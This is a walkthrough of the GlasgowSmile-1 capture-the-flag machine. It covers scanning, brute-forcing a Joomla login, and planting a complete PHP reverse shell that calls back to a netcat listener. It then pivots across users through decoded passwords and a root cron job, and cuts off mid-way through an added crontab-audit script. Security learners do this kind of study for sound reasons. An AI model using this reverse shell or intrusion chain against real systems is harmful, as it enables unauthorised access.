Penetration testing: a practice log for the GlasgowSmile-1 target machine


I. Information gathering

1. nmap scan

┌──(root💀kali)-[~]
└─# nmap -A -p- 10.0.0.34
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-08 07:40 EDT
Nmap scan report for 10.0.0.34
Host is up (0.00038s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
|   256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
|_  256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:C2:6D:14 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 10.0.0.34

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.91 seconds

2. dirsearch scan

┌──(root💀kali)-[~/tools/dirsearch]
└─# python3 dirsearch.py -u http://10.0.0.34    

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/tools/dirsearch/reports/10.0.0.34/_21-09-08_07-45-58.txt

Error Log: /root/tools/dirsearch/logs/errors-21-09-08_07-45-58.log

Target: http://10.0.0.34/

[07:45:58] Starting: 
[07:45:59] 403 -  274B  - /.ht_wsr.txt                                     
[07:45:59] 403 -  274B  - /.htaccess.bak1
[07:45:59] 403 -  274B  - /.htaccess.orig
[07:45:59] 403 -  274B  - /.htaccess.sample
[07:45:59] 403 -  274B  - /.htaccess_extra
[07:45:59] 403 -  274B  - /.htaccessBAK
[07:45:59] 403 -  274B  - /.htaccessOLD
[07:45:59] 403 -  274B  - /.htaccess_orig
[07:45:59] 403 -  274B  - /.htaccess.save
[07:45:59] 403 -  274B  - /.htaccess_sc                                    
[07:45:59] 403 -  274B  - /.htaccessOLD2
[07:45:59] 403 -  274B  - /.htpasswds
[07:45:59] 403 -  274B  - /.htm
[07:45:59] 403 -  274B  - /.htpasswd_test
[07:45:59] 403 -  274B  - /.httr-oauth
[07:45:59] 403 -  274B  - /.html
[07:46:00] 403 -  274B  - /.php                                            
[07:46:17] 200 -  125B  - /index.html                                       
[07:46:18] 301 -  307B  - /joomla  ->  http://10.0.0.34/joomla/             
[07:46:18] 301 -  321B  - /joomla/administrator  ->  http://10.0.0.34/joomla/administrator/
[07:46:18] 200 -   10KB - /joomla/                                          
[07:46:27] 403 -  274B  - /server-status                                    
[07:46:27] 403 -  274B  - /server-status/                                   
                                                                             
Task Completed
                                                                                                                                                                           
┌──(root💀kali)-[~/tools/dirsearch]
└─# 

II. Password brute forcing

1. Generate a password wordlist with cewl

┌──(root💀kali)-[~/game/glasgow_smile_1]
└─# cewl http://10.0.0.34/joomla -m 5 -d 1 -w joker.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                                                                                                                                                                                                                   
┌──(root💀kali)-[~/game/glasgow_smile_1]
└─# ls
joker.txt

2. Brute-force the login with Burp Suite's Intruder module, using the joker.txt wordlist just generated as the password list.

3. The attack recovers one credential pair: joomla/Gotham

III. Exploitation

1. Log in to the administrator back end; there is a place where PHP files can be edited.

2. Add the following code to the template's index.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is sent down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	global $daemon;  // without this, the function only ever sees an undefined local $daemon
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

3. After saving, click template preview and a shell comes back to the listener.

┌──(root💀kali)-[~/game/glasgow_smile_1]
└─# nc -vlnp 4444     
listening on [any] 4444 ...
connect to [10.0.0.11] from (UNKNOWN) [10.0.0.34] 49012
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 07:34:12 up  1:22,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@glasgowsmile:/$ 


IV. Digging for information

1. See whether any useful files can be found on the system

www-data@glasgowsmile:/home$ ls
ls
abner  penguin  rob

www-data@glasgowsmile:/var/www/joomla2$ ls
ls
LICENSE.txt    cli                includes   media       tmp
README.txt     components         index.php  modules     web.config.txt
administrator  configuration.php  language   plugins
bin            htaccess.txt       layouts    robots.txt
cache          images             libraries  templates
www-data@glasgowsmile:/var/www/joomla2$ cat configuration.php
cat configuration.php
<?php
class JConfig {
        public $offline = '0';
      # ... middle omitted ...
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'joomla';
        public $password = 'babyjoker';
        public $db = 'joomla_db';
       # ... rest omitted ...

2. Use these database credentials to search for information

www-data@glasgowsmile:/var/www/joomla2$ mysql -u joomla -p
mysql -u joomla -p
Enter password: babyjoker

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 152
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| batjoke            |
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.002 sec)
MariaDB [joomla_db]> use batjoke
use batjoke
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [batjoke]> show tables;
show tables;
+-------------------+
| Tables_in_batjoke |
+-------------------+
| equipment         |
| taskforce         |
+-------------------+
2 rows in set (0.000 sec)

MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.000 sec)

MariaDB [batjoke]> 
# There is a record for rob, and the value after it is probably a password. But how do the online walkthroughs all know it is Base64-encoded? Experience, presumably.
┌──(root💀kali)-[~/tools/dirsearch]
└─# echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' |base64 -d       
???AllIHaveAreNegativeThoughts???
# Decoding yields what looks like a password, and a long one at that. Try it over ssh.


3. After logging in over ssh, see whether higher privileges can be obtained

www-data@glasgowsmile:/home$ ssh rob@10.0.0.34
ssh rob@10.0.0.34
Could not create directory '/var/www/.ssh'.
The authenticity of host '10.0.0.34 (10.0.0.34)' can't be established.
ECDSA key fingerprint is SHA256:05TCY2Nw37yPYIluFAe7y4vTCupftlAxY+jXZsTJu88.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
rob@10.0.0.34's password: ???AllIHaveAreNegativeThoughts???

Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$ 

4. Only three files draw our attention

rob@glasgowsmile:~$ ls -al
ls -al
total 52
drwxr-xr-x 3 rob  rob  4096 Jun 16  2020 .
drwxr-xr-x 5 root root 4096 Jun 15  2020 ..
-rw-r----- 1 rob  rob   454 Jun 14  2020 Abnerineedyourhelp
-rw------- 1 rob  rob     7 Sep  7 08:53 .bash_history
-rw-r--r-- 1 rob  rob   220 Jun 13  2020 .bash_logout
-rw-r--r-- 1 rob  rob  3526 Jun 13  2020 .bashrc
-rw-r----- 1 rob  rob   313 Jun 14  2020 howtoberoot
drwxr-xr-x 3 rob  rob  4096 Jun 13  2020 .local
-rw------- 1 rob  rob    81 Jun 15  2020 .mysql_history
-rw-r--r-- 1 rob  rob   807 Jun 13  2020 .profile
-rw-r--r-- 1 rob  rob    66 Jun 15  2020 .selected_editor
-rw-r----- 1 rob  rob    38 Jun 13  2020 user.txt
-rw------- 1 rob  rob   429 Jun 16  2020 .Xauthority
rob@glasgowsmile:~$ cat user.txt
cat user.txt
# Not clear yet what this is for
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat howtoberoot
cat howtoberoot
  _____ ______   __  _   _    _    ____  ____  _____ ____  
 |_   _|  _ \ \ / / | | | |  / \  |  _ \|  _ \| ____|  _ \ 
   | | | |_) \ V /  | |_| | / _ \ | |_) | | | |  _| | |_) |
   | | |  _ < | |   |  _  |/ ___ \|  _ <| |_| | |___|  _ < 
   |_| |_| \_\|_|   |_| |_/_/   \_\_| \_\____/|_____|_| \_\
# This one is just a taunt
NO HINTS.
rob@glasgowsmile:~$ cat Abnerineedyourhelp
cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
rob@glasgowsmile:~$ 
# The last token above is obviously a password that needs decoding, and the text before it is obviously an enciphered message. From the short words you can tell it is a simple shift cipher: for example, z clearly has to be a to make sense, and sn has to be to. So every letter is shifted by one position. The fully decoded message is:
Hello Dear, Arthur suffers from severe mental illness but we see little symapthy for his conditions. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
# On checking, the password string is also shifted by one character. This is a good excuse to write a small program and practise some Python.
┌──(root💀kali)-[~/tools/dirsearch]
└─# echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0  
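The program suggested above, added to this write-up and not part of the original post. It tries all 26 shifts on the message from Abnerineedyourhelp, keeps the one that scores best as English, applies the same shift to the Base64 string before decoding it, and includes the alphabet-and-padding heuristic that answers the earlier question of how one recognises Base64 in the first place (the word list and the scoring rule are assumptions of this example):

```python
import base64
import re

# Constructed from the two puzzle strings in rob's Abnerineedyourhelp file.
CIPHERTEXT = ("Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd "
              "rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc.")
CIPHER_B64 = "RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ=="

# Small set of very common English words, used only to score candidate shifts (assumption).
COMMON_WORDS = {"the", "and", "to", "of", "is", "his", "you", "for", "but",
                "we", "see", "from", "this", "about", "being", "can", "find"}


def shift_text(text, shift):
    """Rotate A-Z and a-z by `shift` positions, preserving case; digits, '+', '/', '=' stay put."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text):
    """Count how many whitespace-separated tokens (punctuation stripped) are common English words."""
    tokens = (t.strip(".,\"'").lower() for t in text.split())
    return sum(t in COMMON_WORDS for t in tokens)


def find_shift(ciphertext):
    """Try all 26 shifts and return the one whose output reads most like English."""
    return max(range(26), key=lambda s: english_score(shift_text(ciphertext, s)))


def looks_like_base64(s):
    """The usual tell: only [A-Za-z0-9+/], at most two '=' of padding, length a multiple of 4."""
    return len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) is not None


def recover_password(cipher_b64, shift):
    """Undo the letter shift on the Base64 text, then Base64-decode the result."""
    shifted = shift_text(cipher_b64, shift)
    if not looks_like_base64(shifted):
        raise ValueError("shifted text is not valid Base64")
    return base64.b64decode(shifted).decode("utf-8", errors="replace")


if __name__ == "__main__":
    shift = find_shift(CIPHERTEXT)
    print(f"shift = {shift}")
    print(shift_text(CIPHERTEXT, shift))
    print(recover_password(CIPHER_B64, shift))
```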
# Log in as Abner; usernames are usually lowercase
rob@glasgowsmile:~$ su Abner
su Abner
su: user Abner does not exist
rob@glasgowsmile:~$ su abner
su abner
Password: I33hope99my0death000makes44more8cents00than0my0life0
abner@glasgowsmile:/home/rob$ 
abner@glasgowsmile:~$ ls
ls
info.txt  user2.txt
abner@glasgowsmile:~$ cat info.txt
cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
abner@glasgowsmile:~$ cat user2.txt
cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
# This does not seem useful either. Now only the penguin user is left with no information, so search for it first.
abner@glasgowsmile:~$ find / -iname *penguin* 2>/dev/null
find / -iname *penguin* 2>/dev/null
/home/penguin
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
# This zip file is clearly the important find. Copy it to the current user's home directory and unzip it; the archive password is abner's password.
abner@glasgowsmile:~$ cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~ && unzip .dear_penguins.zip


Archive:  .dear_penguins.zip
[.dear_penguins.zip] dear_penguins password: I33hope99my0death000makes44more8cents00than0my0life0

  inflating: dear_penguins           
abner@glasgowsmile:~$ 

abner@glasgowsmile:~$ ls
ls
dear_penguins  info.txt  user2.txt
abner@glasgowsmile:~$ cat dear_penguins
cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
abner@glasgowsmile:~$ 
# The last line should be penguin's password

5. Log in as penguin

abner@glasgowsmile:~$ su penguin
su penguin
Password: scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

penguin@glasgowsmile:/home/abner$ 

penguin@glasgowsmile:/home/abner$ id
id
uid=1002(penguin) gid=1002(penguin) groups=1002(penguin)
penguin@glasgowsmile:/home/abner$ cd ~
cd ~
penguin@glasgowsmile:~$ ls 
ls 
SomeoneWhoHidesBehindAMask
penguin@glasgowsmile:~$ cd SomeoneWhoHidesBehindAMask
cd SomeoneWhoHidesBehindAMask
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ ls -al
ls -al
total 332
drwxr--r-- 2 penguin penguin   4096 Jun 16  2020 .
drwxr-xr-x 5 penguin penguin   4096 Jun 16  2020 ..
-rwSr----- 1 penguin penguin 315904 Jun 15  2020 find
-rw-r----- 1 penguin root      1457 Jun 15  2020 PeopleAreStartingToNotice.txt
-rwxr-xr-x 1 penguin root       612 Jun 16  2020 .trash_old
-rw-r----- 1 penguin penguin     38 Jun 16  2020 user3.txt
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt
cat user3.txt
JKR{284a3753ec11a592ee34098b8cb43d52}
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat PeopleAreStartingToNotice.txt
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.

Joker

  _____    _____      __      _   __   ________       _____   ________      ______     _____     ____     __    __   ________    _____   _________   __    __   _____       ______   
 (_   _)  / ____\    /  \    / ) (  ) (___  ___)     (_   _) (___  ___)    (_   _ \   / ___/    (    )    ) )  ( (  (___  ___)  (_   _) (_   _____)  ) )  ( (  (_   _)     (_____ \  
   | |   ( (___     / /\ \  / /   \/      ) )          | |       ) )         ) (_) ) ( (__      / /\ \   ( (    ) )     ) )       | |     ) (___    ( (    ) )   | |          ___) ) 
   | |    \___ \    ) ) ) ) ) )          ( (           | |      ( (          \   _/   ) __)    ( (__) )   ) )  ( (     ( (        | |    (   ___)    ) )  ( (    | |         (  __/  
   | |        ) )  ( ( ( ( ( (            ) )          | |       ) )         /  _ \  ( (        )    (   ( (    ) )     ) )       | |     ) (       ( (    ) )   | |   __     )_)    
  _| |__  ___/ /   / /  \ \/ /           ( (          _| |__    ( (         _) (_) )  \ \___   /  /\  \   ) \__/ (     ( (       _| |__  (   )       ) \__/ (  __| |___) )    __     
 /_____( /____/   (_/    \__/            /__\        /_____(    /__\       (______/    \____\ /__(  )__\  \______/     /__\     /_____(   \_/        \______/  \________/    (__)    



penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
cat .trash_old
#/bin/sh

#       (            (              )            (      *    (   (
# (      )\ )   (     )\ ) (      ( /( (  (       )\ ) (  `   )\ ))\ )
# )\ )  (()/(   )\   (()/( )\ )   )\()))\))(   ' (()/( )\))( (()/(()/( (
#(()/(   /(_)((((_)(  /(_)(()/(  ((_)\((_)()\ )   /(_)((_)()\ /(_)/(_)))\
# /(_))_(_))  )\ _ )\(_))  /(_))_  ((__(())\_)() (_)) (_()((_(_))(_)) ((_)
#(_)) __| |   (_)_\(_/ __|(_)) __|/ _ \ \((_)/ / / __||  \/  |_ _| |  | __|
#  | (_ | |__  / _ \ \__ \  | (_ | (_) \ \/\/ /  \__ \| |\/| || || |__| _|
#   \___|____|/_/ \_\|___/   \___|\___/ \_/\_/   |___/|_|  |_|___|____|___|
#

#

 
exit 0
# This file is editable; not yet clear what it is for.

6. Try pspy64 and see what turns up

penguin@glasgowsmile:~$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
--2021-09-08 09:16:11--  https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.109.154, 185.199.111.154, 185.199.110.154, ...
Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.109.154|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.94M   843KB/s    in 3.6s    

2021-09-08 09:16:17 (843 KB/s) - ‘pspy64’ saved [3078592/3078592]

penguin@glasgowsmile:~$ chmod +x pspy64
chmod +x pspy64
penguin@glasgowsmile:~$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/09/08 09:16:33 CMD: UID=0    PID=91     | 
# ... many irrelevant entries omitted ...
2021/09/08 09:17:01 CMD: UID=0    PID=2163   | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 
2021/09/08 09:17:01 CMD: UID=0    PID=2164   | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly 
2021/09/08 09:18:01 CMD: UID=0    PID=2165   | /usr/sbin/CRON -f 
2021/09/08 09:18:01 CMD: UID=0    PID=2166   | /usr/sbin/CRON -f 
2021/09/08 09:18:01 CMD: UID=0    PID=2167   | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 
2021/09/08 09:19:01 CMD: UID=0    PID=2168   | /usr/sbin/CRON -f 
2021/09/08 09:19:01 CMD: UID=0    PID=2169   | /usr/sbin/CRON -f 
2021/09/08 09:19:01 CMD: UID=0    PID=2170   | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 
2021/09/08 09:20:01 CMD: UID=0    PID=2171   | /usr/sbin/CRON -f 
2021/09/08 09:20:01 CMD: UID=0    PID=2172   | /usr/sbin/CRON -f 
2021/09/08 09:20:01 CMD: UID=0    PID=2173   | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old 

# We saw earlier that .trash_old is editable, and it also runs once every minute as root! So use it to get a reverse shell.
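The misconfiguration itself is worth stating plainly: a root cron job executes a file that a non-root user owns and can edit. As an added example that is not part of the original write-up, the following Python audit parses system crontab entries and flags root-run scripts whose file or parent directory a non-root user controls; the crontab lines and the directory layout are constructed to mirror the box, and the trusted-uid parameter is an assumption so the demo can run unprivileged:

```python
import os
import stat
import tempfile

# Constructed /etc/crontab-style lines modelled on what pspy showed on the box:
# root runs a script that lives in penguin's home directory every minute.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
"""


def parse_system_crontab(text):
    """Return (user, command) for each job line of a system crontab (five time fields, user, command)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def script_path(command):
    """Return the first absolute path in a cron command: the file whose contents root will run."""
    for token in command.replace("&&", " ").split():
        if token.startswith("/") and len(token) > 1:
            return token
    return None


def audit_script(path, trusted_uids=(0,)):
    """List the ways a user outside trusted_uids could change what root executes via this path."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist; whoever can create it chooses what root runs"]
    if st.st_uid not in trusted_uids:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root; the owner can rewrite it")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world writable (mode {stat.S_IMODE(st.st_mode):04o})")
    parent = os.stat(os.path.dirname(path))
    if parent.st_uid not in trusted_uids or parent.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: parent directory not root-controlled; file can be replaced")
    return findings


def audit_crontab(text, trusted_uids=(0,)):
    """Audit every job that runs as root; returns {script_path: [findings]}."""
    report = {}
    for user, command in parse_system_crontab(text):
        path = script_path(command)
        if user == "root" and path:
            report[path] = audit_script(path, trusted_uids)
    return report


def demo():
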